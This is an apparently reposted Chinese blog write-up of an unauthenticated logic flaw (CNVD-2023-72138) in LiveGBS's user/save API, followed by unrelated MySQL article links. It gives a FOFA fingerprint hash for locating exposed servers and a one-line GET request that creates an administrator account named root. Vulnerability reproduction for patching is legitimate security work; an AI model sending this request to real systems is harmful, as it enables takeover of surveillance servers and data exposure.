博客
关于我
LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)
阅读量:794 次
发布时间:2023-02-06

本文共 585 字,大约阅读时间需要 1 分钟。

LiveGBS是一款由安徽青柿信息科技有限公司开发的国标(GB28181)流媒体服务软件,主要功能包括用户管理、Web可视化页面管理以及开源的前端页面源码提供,同时还支持设备状态管理,可实时监控设备是否正常运行。

在技术细节方面,该软件的user/save接口存在严重的逻辑漏洞。攻击者无需进行身份验证即可利用此漏洞,通过传递特定参数(如ID、Username、Role等),可以执行用户信息的任意添加操作。这种漏洞一旦被利用,会导致后台服务被接管,造成信息泄露等安全风险。

该漏洞主要影响LiveGBS版本号≤3.2.x的产品,已知攻击可能对系统造成严重后果。为了帮助开发团队快速定位问题,我们提供了以下复现环境信息:

FOFA hash: -206100324

至于漏洞的具体复现方法,我们提供了以下PoC示例:

GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML,

通过上述方法,可以有效复现漏洞现象。建议开发者及时修复该漏洞,以确保系统安全性。

转载地址:http://tuufk.baihongyu.com/

你可能感兴趣的文章
MySQL 深度分页性能急剧下降,该如何优化?
查看>>
MySQL 深度分页性能急剧下降,该如何优化?
查看>>
MySQL 添加列,修改列,删除列
查看>>
mysql 添加索引
查看>>
MySQL 添加索引,删除索引及其用法
查看>>
mysql 状态检查,备份,修复
查看>>
MySQL 用 limit 为什么会影响性能?
查看>>
MySQL 用 limit 为什么会影响性能?有什么优化方案?
查看>>
MySQL 用户权限管理:授权、撤销、密码更新和用户删除(图文解析)
查看>>
mysql 用户管理和权限设置
查看>>
MySQL 的 varchar 水真的太深了!
查看>>
mysql 的GROUP_CONCAT函数的使用(group_by 如何显示分组之前的数据)
查看>>
MySQL 的instr函数
查看>>
MySQL 的mysql_secure_installation安全脚本执行过程介绍
查看>>
MySQL 的Rename Table语句
查看>>
MySQL 的全局锁、表锁和行锁
查看>>
mysql 的存储引擎介绍
查看>>
MySQL 的存储引擎有哪些?为什么常用InnoDB?
查看>>
Mysql 知识回顾总结-索引
查看>>
Mysql 笔记
查看>>